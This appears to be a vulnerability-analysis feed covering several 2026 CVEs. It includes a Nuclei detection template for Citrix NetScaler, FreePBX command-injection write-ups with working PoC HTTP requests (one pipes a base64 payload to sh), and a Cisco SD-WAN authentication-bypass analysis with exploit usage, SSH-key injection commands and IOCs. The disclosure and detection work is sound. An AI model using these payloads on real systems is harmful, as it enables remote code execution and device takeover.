Activity Feed
Technical Analysis
CVE-2026-3055 — Detection & Recon Analysis
1. Executive summary
| Aspect | Assessment |
|---|---|
| Purpose | Identify NetScaler ADC/Gateway surfaces that expose SAML/WS-Federation–related HTTP endpoints and return content consistent with Citrix IdP/federation behavior. |
| CVE linkage | Template metadata maps to CVE-2026-3055, CWE-125, Citrix bulletin CTX696300, and a CVSS 4.0 score of 9.3 per embedded classification. |
| What is proven | Exposure and configuration class (reachable endpoints + response shape). |
| What is not proven | Exploitability, memory disclosure size, or patch level. Detection hits are indicators, not proof of successful exploitation. |
2. Technical surface under test
The template issues up to four GET requests per target (first successful match stops further paths due to stop-at-first-match: true):
| Path | Role |
|---|---|
| /cgi/GetAuthMethods | Unauthenticated XML describing authentication methods; strong signal when `<authMethods`-style content is returned. |
| /wsfed/passive | Passive WS-Federation listener; useful strings include SAML/“process Assertion” style content. |
| /saml/idp/metadata | SAML IdP metadata (EntityDescriptor / IDPSSODescriptor). |
| /FederationMetadata/2007-06/FederationMetadata.xml | AD FS–style federation metadata path sometimes used in similar deployments. |
Redirects are limited (max-redirects: 2), which reduces drift onto unrelated pages while still allowing typical HTTPS redirects.
3. Matcher logic (Nuclei)
All of the following must hold (matchers-condition: and):
- HTTP 200 — Only successful responses are considered. Errors, redirects that do not end in 200 on the tested URL chain, or auth walls that return non-200 will not match.
- Content indicators (`citrix-recon-indicators`) — A word matcher on the response body with `condition: or` across: `<authMethods` (GetAuthMethods), `process Assertion` (WS-Fed/SAML processing), `<EntityDescriptor`/`IDPSSODescriptor` (SAML metadata).
- Product fingerprint (`citrix-product-fingerprint`) — A DSL matcher requiring at least one of:
  - Substrings in headers (`nsc_`, `citrix`, `netscaler`, `authenticateresponse`), or
  - Substrings in body (`citrix`, `netscaler`, `explicitforms`).
Why the DSL layer exists: A header-only fingerprint misses deployments that return valid body content without distinctive Server/Set-Cookie strings on that specific response. Combining body keywords with the recon strings above keeps the template closer to “Citrix federation surface” than to generic pages that merely mention “Citrix.”
Extractors pull ExplicitForms or SAML from the body for reporting; they do not affect matching.
4. Strengths
- Multi-path coverage reduces single-endpoint blind spots (e.g., metadata available when GetAuthMethods is locked down).
- Fingerprint OR logic in the DSL layer improves recall versus the previous header-only approach.
- References point to vendor remediation (CTX696300), supporting defensive prioritization.
5. Limitations and false signals
| Risk | Description |
|---|---|
| False negatives | Strict 200 requirement excludes useful 401/403 cases where presence of the endpoint still matters for risk. Deployments behind WAFs or returning custom error pages may not match. |
| False positives | Any host that returns 200 with body strings matching the patterns and generic words like citrix or netscaler could match without being a vulnerable build. |
| Version / patch | The template does not read version strings or build numbers; patching status must be verified separately (appliance UI, show version, vendor advisory matrix). |
| Exploit confirmation | Per vendor and research details, confirmation of the underlying issue typically requires controlled testing beyond passive GETs. The repo’s recon_poc.sh intentionally omits stress/trigger steps. |
6. recon_poc.sh alignment
The script performs manual, low-impact checks aligned with the template’s first two paths:
- Default `TARGET=127.0.0.1` to steer usage toward lab environments.
- Optional `PROXY` for traffic inspection (e.g., Burp) without hardcoding a third-party host.
- Warning when the target is not localhost.
- Explicit disclaimer that results are indicators only, not exploitability proof.
Operationally, the script is useful for validating that a lab NetScaler returns expected XML/snippet shapes before running fuller scanner workflows.
7. Defensive recommendations
- Patch per CTX696300 on supported versions; treat matches as priority candidates for patch verification.
- Reduce exposure: restrict management and federation endpoints where architecture allows; enforce TLS and monitoring on `/cgi/*` and federation paths.
- Correlate scanner findings with asset inventory and IdP configuration (SAML vs WS-Fed vs LDAP-only) before treating a hit as production-critical.
8. Document scope
This analysis describes detection logic in this repository only. It does not reproduce exploit methodology, timing thresholds, or payload sizes. For authoritative vulnerability details, rely on Citrix publications and your organization’s security advisories.
```yaml
info:
  name: Citrix NetScaler ADC/Gateway - Advanced SAML IdP & Recon Detection (CVE-2026-3055)
  author: Enoson Mathivannan(https://www.linkedin.com/in/enoson-mathivannan-636985121/)
  severity: critical
  description: |
    Detects Citrix NetScaler ADC and Gateway systems configured as a SAML Identity Provider (IdP)
    by checking for both official metadata endpoints and active reconnaissance targets identified
    in the wild. These configurations are vulnerable to CVE-2026-3055 (CitrixBleed 3).
  remediation: |
    Apply the security updates provided by Citrix in bulletin CTX696300 immediately.
    Systems exposing these endpoints should be prioritized for patching.
  reference:
    - https://support.citrix.com/s/article/CTX696300
    - https://x.com/watchtowrcyber/status/2037629558375993639
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L
    cvss-score: 9.3
    cve-id: CVE-2026-3055
    cwe-id: CWE-125
  metadata:
    max-request: 4
    product: netscaler_adc
    vendor: citrix
  tags: cve,cve2026,citrix,netscaler,saml,memory-leak,oob-read,recon

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi/GetAuthMethods"
      - "{{BaseURL}}/wsfed/passive"
      - "{{BaseURL}}/saml/idp/metadata"
      - "{{BaseURL}}/FederationMetadata/2007-06/FederationMetadata.xml"

    stop-at-first-match: true
    max-redirects: 2
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        name: citrix-recon-indicators
        words:
          - "<authMethods"        # From /cgi/GetAuthMethods
          - "process Assertion"   # From /wsfed/passive (SAML signature)
          - "<EntityDescriptor"   # From SAML Metadata
          - "IDPSSODescriptor"    # From SAML Metadata
        case-insensitive: true
        condition: or

      # Header-only fingerprints miss many gateways; allow body hints (same request).
      - type: dsl
        name: citrix-product-fingerprint
        dsl:
          - "contains(tolower(all_headers), 'nsc_') || contains(tolower(all_headers), 'citrix') || contains(tolower(all_headers), 'netscaler') || contains(tolower(all_headers), 'authenticateresponse') || contains(tolower(body), 'citrix') || contains(tolower(body), 'netscaler') || contains(tolower(body), 'explicitforms')"

    extractors:
      - type: regex
        name: exposed-endpoint
        part: body
        regex:
          - "ExplicitForms"   # Extracted from GetAuthMethods
          - "SAML"            # Extracted from Metadata
```
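To reason about what a hit does and does not prove (and about the false-positive class noted in section 5), here is an added Python re-implementation of the template's three matcher layers and its extractors, run over constructed sample responses. It is not part of the template or repository; the response bodies, cookie value and hostnames are made up.

```python
import re
from dataclasses import dataclass

# Strings copied from the template's matchers; the word matcher is case-insensitive and
# the DSL lowercases headers/body, so everything is compared in lowercase here too.
RECON_INDICATORS = ("<authmethods", "process assertion", "<entitydescriptor", "idpssodescriptor")
HEADER_HINTS = ("nsc_", "citrix", "netscaler", "authenticateresponse")
BODY_HINTS = ("citrix", "netscaler", "explicitforms")
EXTRACTOR_PATTERNS = ("ExplicitForms", "SAML")   # regex extractors are case-sensitive
PATHS = ("/cgi/GetAuthMethods", "/wsfed/passive", "/saml/idp/metadata",
         "/FederationMetadata/2007-06/FederationMetadata.xml")


@dataclass
class Response:
    """Minimal stand-in for what nuclei sees after following at most two redirects."""
    status: int
    headers: dict
    body: str


def evaluate(resp: Response):
    """Apply the three matchers with matchers-condition: and.

    Returns (matched, reason, extracted) so a reviewer can see which layer rejected
    the response and what the extractors would have reported on a hit.
    """
    if resp.status != 200:
        return False, "status matcher: non-200 response", []
    body = resp.body.lower()
    if not any(w in body for w in RECON_INDICATORS):
        return False, "citrix-recon-indicators: no indicator string in body", []
    # nuclei's all_headers is the raw header block; rebuild it the same way.
    all_headers = "\n".join(f"{k}: {v}" for k, v in resp.headers.items()).lower()
    fingerprint = any(h in all_headers for h in HEADER_HINTS) or any(b in body for b in BODY_HINTS)
    if not fingerprint:
        return False, "citrix-product-fingerprint: no header or body hint", []
    extracted = [p for p in EXTRACTOR_PATTERNS if re.search(p, resp.body)]
    return True, "all three matchers satisfied", extracted


def first_match(responses_by_path: dict):
    """Emulate stop-at-first-match: probe paths in template order, stop at the first hit."""
    for path in PATHS:
        resp = responses_by_path.get(path)
        if resp is None:
            continue
        matched, _, extracted = evaluate(resp)
        if matched:
            return path, extracted
    return None, []


# Constructed sample responses (not captured from a real appliance).
NETSCALER_AUTHMETHODS = Response(
    200,
    {"Content-Type": "text/xml", "Set-Cookie": "NSC_TASS=example; Secure; HttpOnly"},
    '<?xml version="1.0"?><authMethods><method name="ExplicitForms"/></authMethods>',
)
# The false-negative case from section 5: endpoint present but locked down.
LOCKED_DOWN_AUTHMETHODS = Response(401, {"Content-Type": "text/html"}, "<html>Unauthorized</html>")
NETSCALER_SAML_METADATA = Response(
    200,
    {"Content-Type": "application/samlmetadata+xml"},
    '<EntityDescriptor entityID="https://gw.example.test/saml/idp"><IDPSSODescriptor/>'
    "</EntityDescriptor><!-- NetScaler SAML IdP -->",
)
# The false-positive case from section 5: a non-Citrix IdP whose metadata merely
# mentions "Citrix", so the body hint satisfies the fingerprint layer.
THIRD_PARTY_METADATA = Response(
    200,
    {"Content-Type": "application/xml", "Server": "nginx"},
    '<EntityDescriptor entityID="https://idp.example.test"><IDPSSODescriptor/>'
    "<Organization>Citrix Reseller Inc.</Organization></EntityDescriptor>",
)

if __name__ == "__main__":
    appliance = {PATHS[0]: LOCKED_DOWN_AUTHMETHODS, PATHS[2]: NETSCALER_SAML_METADATA}
    print(first_match(appliance))          # metadata path hits after GetAuthMethods is rejected
    print(evaluate(THIRD_PARTY_METADATA))  # matches although the host is not a NetScaler
```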
Technical Analysis
On March 23, 2026, Citrix published a security advisory for a critical vulnerability affecting their NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway) products. This vulnerability, CVE-2026-3055, which is classified as an out-of-bounds read and holds a CVSS score of 9.3, allows unauthenticated remote attackers to leak potentially sensitive information from the appliance’s memory. The Citrix advisory states that systems configured as a SAML Identity Provider (SAML IDP) are vulnerable, whereas default configurations are unaffected.
As of the advisory’s publication, there is no known in-the-wild exploitation and no public proof-of-concept (PoC) available. According to Citrix, the vulnerability was identified internally via security review. However, exploitation of CVE-2026-3055 is likely to occur once exploit code becomes public, since the affected software is broadly exposed to the internet. Customers running affected Citrix systems should remediate this vulnerability as soon as possible; Citrix software has previously seen memory leak vulnerabilities broadly exploited in the wild, including the infamous “CitrixBleed” vulnerability, CVE-2023-4966, in 2023.
I’ve rated ‘Attacker Value’ as ‘High’ and ‘Exploitability’ as ‘Medium’. These were chosen because the affected configuration is non-default and the difficulty of leaking sensitive materials is not yet established, while also taking into consideration that the affected software is broadly exposed to the public internet and has historically been a very popular target for attackers.
Technical Analysis
A command injection vulnerability exists in FreePBX.
User-controlled input is passed unsanitized to a shell command executed via exec(), allowing authenticated attackers to achieve remote code execution (RCE) on the FreePBX server. The vulnerability can be triggered via an AJAX endpoint in the System Recordings module and affects users with access to the recordings functionality.
Affected Products
- Product: FreePBX
- Module: System Recordings
- File: `admin/modules/recordings/Recordings.class.php`
- Function: `function fixeRIFF($filename)`
Tested Versions
- FreePBX 17.0.24
- FreePBX 17.0.25
Vulnerability Type
- OS Command Injection
- CWE-78: Improper Neutralization of Special Elements used in an OS Command
- Leads to Remote Code Execution (RCE)
Attack Vector
Authenticated attacker with access to System Recordings module (including lower-privileged administrative users with module access).
Exploit Path
The FreePBX AJAX endpoint /admin/ajax.php exposes functionality from the System Recordings module.
Two AJAX commands are vulnerable:
[1] module=recordings&command=gethtml5
[2] module=recordings&command=convert
User-supplied POST parameters (e.g. file, filenames[]) are insufficiently sanitized and later passed into shell-executed operations via the Media handling subsystem. This allows command injection through crafted filename values.
Impact:
An attacker with access to the System Recordings module can:
- Execute arbitrary shell commands on the FreePBX server
- Write files to the web root
- Potentially escalate to full system compromise
This represents an escalation from module-level access to OS-level command execution.
Proof of Concept (PoC)
Endpoint 1 — gethtml5
```http
POST /admin/ajax.php HTTP/1.1
Host: target
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=<valid-session>

file=dummy.wav;`touch /var/www/html/pawned`&language=en&temporary[en]=0&filenames[en]=dummy.wav&command=gethtml5&module=recordings
```
Result:
File /var/www/html/pawned is created on the server.
Endpoint 2 — convert
```http
POST /admin/ajax.php HTTP/1.1
Host: target
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=<valid-session>

file=dummy.wav;`touch /var/www/html/pawned`&name=dummy&codec=wav&lang=en&temporary=1&command=convert&module=recordings
```
Result:
File /var/www/html/pawned is created on the server.
Root Cause
- Unsafe handling of user-controlled input used in file and media processing
- Command execution paths reachable via AJAX without sufficient sanitization
- Missing backend authorization enforcement for sensitive operations
The following code snippet shows the vulnerable code in file admin/modules/recordings/Recordings.class.php.
$filename is not sanitized and shell characters are not escaped.
```php
public function fixeRIFF($filename){
    exec("file -b $filename | grep 'RIFF' ", $out, $ret);
    if($ret === 0 ){
        dbug(_("An error is occured on RIFF detection."));
    }
    if(empty($out[0])){
        if (isset($_POST["name"]) && str_starts_with($_POST["name"], "custom/")) {
            $f = str_replace("custom/", "", $_POST["name"]);
        } else {
            $f = str_replace("custom/", "", $_POST["file"]);
        }
        $cmd = "mv ".$this->temp."/$f.wav $filename";
        exec($cmd, $out, $ret);
    }
}
```
Mitigation
FreePBX 16 (recordings) >= 16.0.17.2 && < 16.0.20 are vulnerable. Please upgrade to version 16.0.20.
FreePBX 17 (recordings) >= 17.0.2.4 && < 17.0.5 are vulnerable. Please upgrade to version 17.0.5.
References
CVE-2026-28287
FreePBX vulnerability disclosure
Credits
Discovery –> h00die.gr3y@gmail.com
Technical Analysis
A command injection vulnerability exists in FreePBX when using the ElevenLabs Text-to-Speech (TTS) engine. User-controlled input is passed unsanitized to a shell command executed via exec(), allowing authenticated attackers to achieve remote code execution (RCE) on the FreePBX server.
The vulnerability can be triggered via an AJAX endpoint in the System Recordings module and affects users with access to the recordings functionality.
Affected Product
- Product: FreePBX
- Module: System Recordings
- Driver: ElevenLabs TTS
- File: `admin/modules/recordings/drivers/Elevenlabs.php`
- Function: `convertToAudio()`
Affected Versions
- Confirmed on:
  - FreePBX 16 and 17
- Likely affects all versions where:
  - ElevenLabs TTS driver is present
  - `convertToAudio()` uses `exec()` without argument escaping
Vulnerability Type
- OS Command Injection
- CWE-78: Improper Neutralization of Special Elements used in an OS Command
- Leads to Remote Code Execution (RCE)
Attack Vector
Authenticated attacker with access to System Recordings module (including lower-privileged administrative users with module access).
Root Cause
In convertToAudio(), user-controlled input $file is concatenated directly into a shell command without escaping:
```php
$command = "ffmpeg -y -i ".$amp_conf["ASTSPOOLDIR"]."/tmp/".$file.".MP3".
    " -acodec pcm_s16le -ac 1 -ar 44100 ".
    $amp_conf["ASTSPOOLDIR"]."/tmp/".$file.".wav 2>&1";
exec($command, $output, $returnCode);
```
The $file variable originates from the POST parameter file_name and is not sanitized or escaped, allowing shell meta-characters (e.g., back-ticks) to be injected and executed.
Proof of Concept (PoC)
Payload (Base64-encoded to avoid file creation errors)
echo -n "touch /var/www/html/pawned" | base64
Result:
dG91Y2ggL3Zhci93d3cvaHRtbC9wYXduZWQ=
Injected payload:
echo${IFS}dG91Y2ggL3Zhci93d3cvaHRtbC9wYXduZWQ=|base64${IFS}-d|sh
Exploit Request
[1] First get an ElevenLabs API key (can be obtained from https://elevenlabs.io/app/developers/api-keys) after registration.
[2] Set the API key with the request below.
```http
GET /admin/ajax.php?module=recordings&command=setapikey&engine=Elevenlabs&key=sk_REDACTED HTTP/1.1
Host: <target>
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=<valid-session>
```
[3] Submit the exploit requests using a valid VoiceId that you can obtain from the response from the request above.
```http
POST /admin/ajax.php?module=recordings&command=ttsConvert HTTP/1.1
Host: <target>
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=<valid-session>

engine=Elevenlabs&file_name=;`echo${IFS}dG91Y2ggL3Zhci93d3cvaHRtbC9wYXduZWQ=|base64${IFS}-d|sh`;&text=Cuckoo&voiceId=CwhRBWXzGAHq8TQ4Fs17&langCode=en
```
Result:
The command executes successfully and creates the file:
/var/www/html/pawned
This confirms arbitrary command execution on the FreePBX host.
Preconditions
- Valid FreePBX login
- Access to System Recordings module
- ElevenLabs API key configured (free tier sufficient)
Impact
- Remote Code Execution as the web server user (typically asterisk or www-data)
- Full compromise of the PBX system
- Potential lateral movement, call interception, credential theft
Mitigation
FreePBX 16 (recordings) >= 16.0.17.2 && < 16.0.20 are vulnerable. Please upgrade to version 16.0.20.
FreePBX 17 (recordings) >= 17.0.2.4 && < 17.0.5 are vulnerable. Please upgrade to version 17.0.5.
References
CVE-2026-28209
FreePBX vulnerability disclosure
Credits
Discovery –> h00die.gr3y@gmail.com
Technical Analysis
CVE-2026-20127: Cisco Catalyst SD-WAN Authentication Bypass
Overview
On 25th February 2026, Cisco published an advisory for CVE-2026-20127, a critical authentication bypass vulnerability in the vdaemon service of Cisco Catalyst SD-WAN (formerly Viptela). The flaw allows an unauthenticated, remote attacker to subvert the DTLS peering process. By forcing a session into an “Authenticated” state, attackers gain administrative access to the Controller (vSmart) and Manager (vManage), facilitating SSH key injection and subsequent fabric manipulation via NETCONF.
CVE-2026-20127 carries a CVSSv3.1 score of 10.0 (Critical) and is associated with CWE-287: Improper Authentication. A recent investigation by Cisco Talos revealed active exploitation by the threat actor UAT-8616 dating back to 2023.
Impact
Analysis of UAT-8616’s activity confirms that CVE-2026-20127 serves as a primary entry primitive for a “Regression Chain” strategy used to achieve persistent root access:
- Initial Foothold: Exploit CVE-2026-20127 to inject an SSH key for the `vmanage-admin` user.
- Firmware Downgrade: Use administrative CLI privileges to force a downgrade to legacy firmware.
- Legacy Exploitation: Leverage known privilege escalation vulnerabilities (e.g., CVE-2022-20775) present in downgraded versions.
- Anti-Forensic Restoration: Re-apply modern firmware to hide the evidence of the version downgrade while maintaining an OS-level backdoor.
Analysis
Our analysis will detail the “Initial Foothold” portion of the threat actor’s chain, showing how CVE-2026-20127 can be used to bypass authentication and inject an attacker-controlled SSH key for the vmanage-admin user. Finally, we will demonstrate how the attacker can leverage this capability to access the NETCONF service and run arbitrary NETCONF commands.
We focused our analysis on version 20.12.5 of the vdaemon service. The service manages proprietary control-plane peering over both UDP and TCP port 12346 (using DTLS and TLS, respectively). Because the authentication bypass resides in the protocol’s state machine logic rather than the transport layer, the vulnerability is reachable via either encrypted tunnel once established.
We identify the following virtual addresses as relevant functions within the compiled binaries.
| Function Purpose | Vulnerable (20.12.5) | Patched (20.12.6.1) | Symbolic Name |
|---|---|---|---|
| Primary Dispatcher | 0x0013e42a | 0x0013e41c | vbond_proc_msg |
| Bypass Handler (Type 10) | 0x00138ab7 | 0x00138ab1 | vbond_proc_challenge_ack_ack |
| Payload Handler (Type 14) | 0x001310ba | 0x001310b4 | vbond_proc_vmanage_to_peer |
Encapsulated Packet Anatomy
This visualizes the “decapsulation” process. It shows that while the outside is a standard DTLS 1.2 packet, the inside is the proprietary vdaemon protocol where the vulnerability resides.
```
+-----------------------+
|   UDP Header (Port)   |
+-----------------------+
|    DTLS 1.2 Record    |
+-----------------------+  <--- Decryption Boundary
|  vdaemon Header (12B) |
+-----------------------+
|     vdaemon Body      |
+-----------------------+
```
The vdaemon message wire format for a CHALLENGE_ACK_ACK message is as follows:
| Byte(s) | Field | Value | Description |
|---|---|---|---|
| 0 | msg_type | 0x0A | Message type 10 (CHALLENGE_ACK_ACK) |
| 1 | device_type | 0x30 | Device type 3 (vSmart), encoded as 3 << 4 |
| 2 | flags | 0xA0 | Control Flags |
| 3 | reserved | 0x00 | Reserved |
| 4-7 | domain_id | 0x00000001 | Domain ID (Big-endian u32) |
| 8-11 | site_id | 0x00000064 | Site ID 100 (Big-endian u32) |
| 12 | verify_status | 0x01 | verify_status flag (1 = authenticated) |
| 13 | Reserved | 0x00 | Reserved |
Note: After decryption and parsing, the vulnerable code loads this message into an internal buffer structure where verify_status is accessed at offset +0x20 relative to the p_msg pointer in memory, accounting for additional header/padding fields in the internal representation.
The Dispatcher Gate (vbond_proc_msg)
The first stage of vbond_proc_msg is a security gate. It evaluates the peer’s authentication status at offset +0x46 of the peer structure, shown as p_peer->is_authenticated below.
In the vulnerable version, the dispatcher maintained an “Allow List” that explicitly whitelisted CHALLENGE_ACK_ACK (Type 10) messages. This allowed unauthenticated peers to pass through the gate. The patch remediates this by removing the Type 10 exemption ([1]).
```diff
if (p_peer->is_authenticated != 1) {
    /* The "Allow List": Handshake messages permitted before authentication */
    if ((msg_type != 5) && (msg_type != 8) &&
-       (msg_type != 9) && (msg_type != 10) &&   // <-- [1]
+       (msg_type != 9) && (msg_type != 0) &&
        (msg_type != 7)) {
        return 0x14; // Reject: Unauthorized
    }
}
```
The Vulnerable Router Logic (vbond_proc_msg)
After several hundred lines of intermediate logistical processing (version negotiation, timer setup, and identity logging), the function reaches vbond_proc_msg. This switch statement is responsible for calling the final handlers.
Because the gate (above) was flawed, an unauthenticated CHALLENGE_ACK_ACK (Type 10) message could reach its handler.
```c
// Reachable if (is_authenticated == 1) OR (msg_type is whitelisted)
switch(msg_type) {
    case 10:
        // This handler blindly sets is_authenticated (+0x46) to 1
        return vbond_proc_challenge_ack_ack(p_vdaemon, p_peer, p_msg);
    case 14:
        // This administrative handler is only reachable if is_authenticated == 1
        return vbond_proc_vmanage_to_peer(p_vdaemon, p_peer, p_msg);
}
```
Root Cause: State Injection (vbond_proc_challenge_ack_ack)
Because the vulnerable dispatcher allowed a CHALLENGE_ACK_ACK (Type 10) message through the gate, the packet reached the vbond_proc_challenge_ack_ack handler. This function blindly trusts a verify_status byte at offset +0x20 of the decrypted message body.
The patch remediates this by removing the assignment logic entirely ([1]). The session state can now only be transitioned to “Authenticated” by the server’s own cryptographic verification results via a CHALLENGE_ACK (Type 9) message, rather than by a status bit provided by the peer.
```diff
// p_msg + 0x20 points to the verify_status bit
if (p_msg->verify_status != 0) {
    // VULNERABLE: Forced assignment based on remote payload
-   p_peer->is_authenticated = 1;   // <-- [1]
    syslog(0xbf, "Handshake completed via ACK_ACK for peer...");
    return 0;
}
```
Privilege Escalation: Authentication Flag Usage (vbond_proc_vmanage_to_peer)
The is_authenticated flag at offset +0x46 acts as the master session key. By leveraging the CHALLENGE_ACK_ACK (Type 10) bypass to force this bit to 1, an attacker “unlocks” the dispatcher, granting access to the VMANAGE_TO_PEER (Type 14) message type.
The vbond_proc_vmanage_to_peer handler then:
- Extracts the SSH public key from the VMANAGE_TO_PEER message body
- Appends it to
/home/vmanage-admin/.ssh/authorized_keys
- Commits the change to persist the configuration
Once the SSH key is in place, the attacker can authenticate as vmanage-admin over SSH to port 830 (NETCONF service), achieving administrative control over the SD-WAN fabric.
Attack Summary
| Step | Benign Peering Flow | Malicious Bypass (CVE-2026-20127) |
|---|---|---|
| 1 | DTLS 1.2 Handshake (Valid Cert) | DTLS 1.2 Handshake (Self-Signed/Bad Cert) |
| 2 | Server sends CHALLENGE (Type 8) | Server sends CHALLENGE (Type 8) |
| 3 | Peer sends CHALLENGE_ACK (Type 9) | Attacker skips CHALLENGE_ACK (Type 9) / Identity Proof |
| 4 | Server verifies RSA Signature | NO CRYPTO VERIFICATION PERFORMED |
| 5 | Server sends CHALLENGE_ACK_ACK (Type 10) | Attacker FORGES CHALLENGE_ACK_ACK (Type 10, verify_status=1) |
| 6 | Peer confirmed as Authenticated | Server blindly sets local auth flag to 1 |
Exploitation
Rapid7 Labs published a PoC that can leverage CVE-2026-20127 to bypass authentication, and subsequently inject an SSH key.
```
Usage: ./bin/vdaemon_exploit TARGET [options]

vdaemon DTLS Authentication Bypass PoC (CVE-2026-20127)

This exploit targets the vbond_proc_challenge_ack_ack() handler.
It sends a forged CHALLENGE_ACK_ACK with verify_status=1, causing
the server to set authenticated=1 without certificate verification.

  -p, --port PORT          DTLS port (default: 12346)
  --inject-key             Generate and inject SSH key into vmanage-admin authorized_keys
  --ssh-key PUBKEY_FILE    Path to SSH public key file to inject
  --cert CERT_FILE         Path to PEM certificate file for DTLS handshake
  --cert-key KEY_FILE      Path to PEM private key file for DTLS handshake (used with --cert)
  --data-dir DIR           Directory for generated keys/certs (default: ./data/)

Examples:
  ./bin/vdaemon_exploit 192.168.86.166
  ./bin/vdaemon_exploit 192.168.86.166 --inject-key
  ./bin/vdaemon_exploit 192.168.86.166 --ssh-key ~/.ssh/id_rsa.pub
  ./bin/vdaemon_exploit 192.168.86.166 --cert ./data/cert.pem --cert-key ./data/key.pem
```
Example
In the example below, the PoC is run against a target Cisco Catalyst SD-WAN Controller appliance and access to the NETCONF service is achieved.
```sh
# Install dependencies
bundle install

# Run exploit - Test the auth bypass
ruby ./bin/vdaemon_exploit 192.168.80.10

# Run exploit - Leverage the auth bypass to inject an SSH key
ruby ./bin/vdaemon_exploit 192.168.80.10 --inject-key

# Leverage SSH key - Login to NETCONF as vmanage-admin
ssh -i /home/cryptocat/Desktop/diff/CVE-2026-20127/data/ssh/attacker_ssh_20260311_093456 vmanage-admin@192.168.80.10 -p 830
```
The following screenshot shows successful exploitation and subsequent SSH access to the NETCONF service:

IOCs
The following indicators are specific to the exploitation of CVE-2026-20127 and the subsequent administrative access achieved via the vdaemon protocol.
1. Control-Plane Peering Anomalies
Exploitation triggers a “Connection UP” event without the typical cryptographic identity exchange. The most distinct marker is the presence of null or uninitialized system identities.
High-Fidelity vsyslog Markers:
- Null Identities: Peering events where `peer-system-ip` is recorded as `::` or `0.0.0.0`.
- Unauthorized vManage/vSmart Peers: Connections from unrecognized IP addresses claiming high-privileged device roles.
Sample /var/log/vsyslog entry:
```
Mar  5 17:30:01 vsmart VDAEMON_0[1556]: %Viptela-vSmart-01-vdaemon_0-5-NTCE-1400002: Notification: control-connection-state-change severity-level:major host-name:"vSmart-01" system-ip:1.1.1.2 personality:vsmart peer-type:vsmart peer-system-ip::: peer-vmanage-system-ip:0.0.0.0 public-ip:192.168.80.130 public-port:38237 src-color:public-internet remote-color:(null) uptime:"0:00:00:00" new-state:up
Mar  5 17:30:13 vsmart VDAEMON_0[1556]: %Viptela-vSmart-01-vdaemon_0-2-CRIT-1400002: Notification: control-no-active-vsmart severity-level:critical host-name:"vSmart-01" system-ip:1.1.1.2 personality:vsmart
Mar  5 17:30:13 vsmart VDAEMON_0[1556]: %Viptela-vSmart-01-vdaemon_0-5-NTCE-1400002: Notification: control-connection-state-change severity-level:major host-name:"vSmart-01" system-ip:1.1.1.2 personality:vsmart peer-type:vsmart peer-system-ip::: peer-vmanage-system-ip:0.0.0.0 public-ip:192.168.80.130 public-port:38237 src-color:public-internet remote-color:(null) uptime:"0:00:00:11" new-state:down
```
2. Immediate Post-Bypass Authentication
As demonstrated in the PoC, the immediate objective of the bypass is to inject an SSH key to the vmanage-admin account to enable CLI access.
High-Fidelity auth.log Markers:
- vmanage-admin SSH Access: Successful `publickey` authentication for the `vmanage-admin` user originating from the same IP address as a suspicious `vdaemon` peering event.
- NETCONF Connectivity: Successful SSH sessions to TCP port `830` (NETCONF) or TCP port `22` immediately following the “Connection UP” log.
Sample /var/log/auth.log entry:
```
Mar  5 17:37:32 vsmart sshd[30257]: Postponed publickey for vmanage-admin from 192.168.80.130 port 54314 ssh2 [preauth]
Mar  5 17:37:32 vsmart sshd[30257]: Accepted publickey for vmanage-admin from 192.168.80.130 port 54314 ssh2: RSA SHA256:wz2FD2K+z/6dLMnB1A3uzaRN7N2SnQ4kPgQZxSN+ERo
Mar  5 17:37:32 vsmart sshd[30257]: pam_unix(sshd:session): session opened for user vmanage-admin(uid=1001) by (uid=0)
```
3. File Integrity: authorized_keys
The primary indicator for this specific vulnerability is the modification of the vmanage-admin SSH configuration.
- Artifact Path: `/home/vmanage-admin/.ssh/authorized_keys`
- Audit Action: Verify any new or unrecognized public keys. The PoC works by appending a key, so auditors should look for multiple keys where only one is expected.
Validation Checklist for Incident Responders
If a suspicious peering event is identified, responders should focus on the following to confirm CVE-2026-20127 exploitation:
| Step | Action | Objective |
|---|---|---|
| 1. Identity Audit | Search logs for `peer-system-ip:::` | Identify “Ghost” peers (0.0.0.0 or ::) bypass. |
| 2. IP Correlation | Cross-reference vsyslog and auth.log | Link the exploit source IP to vmanage-admin login. |
| 3. SSH Key Audit | Inspect authorized_keys for vmanage-admin | Detect unauthorized public key persistence. |
| 4. State Audit | Monitor vdaemon for Up state with null IP | Confirm state-machine bypass (skipping RSA check). |
Remediation
At the time of the advisory’s publication, Cisco does not recommend any workaround strategies for remediation. Organizations running affected instances of Cisco Catalyst SD-WAN Controller or Cisco Catalyst SD-WAN Manager should prioritize upgrading to a fixed version, as outlined below, to remediate CVE-2026-20127.
| Cisco Catalyst SD-WAN Major Release | First Fixed Release |
|---|---|
| 20.18 | 20.18.2.1 |
| 20.16 | 20.18.2.1 |
| 20.15 | 20.15.4.2 |
| 20.14 | 20.15.4.2 |
| 20.13 | 20.15.4.2 |
| 20.12.6 | 20.12.6.1 |
| 20.12.5 | 20.12.5.3 |
| 20.11 | 20.12.6.1 |
| 20.9 | 20.9.8.2 |
| Prior to 20.9 | Migrate to a supported release |
References
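As an added example that is not part of the Rapid7 write-up or its PoC, here is a Python decoder for the vdaemon message layout given in the wire-format table above (12-byte header, then a `verify_status` byte for CHALLENGE_ACK_ACK), together with a passive auditor for step 4 of the responder checklist: a type-10 message carrying `verify_status=1` from a peer that never sent a CHALLENGE_ACK (type 9) is the forged transition shown in the Attack Summary table. The peer addresses and the header-only type-9/type-14 samples are constructed.

```python
import struct
from dataclasses import dataclass
from typing import Optional

# Wire layout from the write-up: a 12-byte vdaemon header, then the message body.
# For CHALLENGE_ACK_ACK (type 10) the body starts with the one-byte verify_status.
_HDR_FMT = ">BBBBII"                 # msg_type, device_type, flags, reserved, domain_id, site_id
HDR_LEN = struct.calcsize(_HDR_FMT)  # 12
MSG_CHALLENGE, MSG_CHALLENGE_ACK, MSG_CHALLENGE_ACK_ACK, MSG_VMANAGE_TO_PEER = 8, 9, 10, 14


@dataclass
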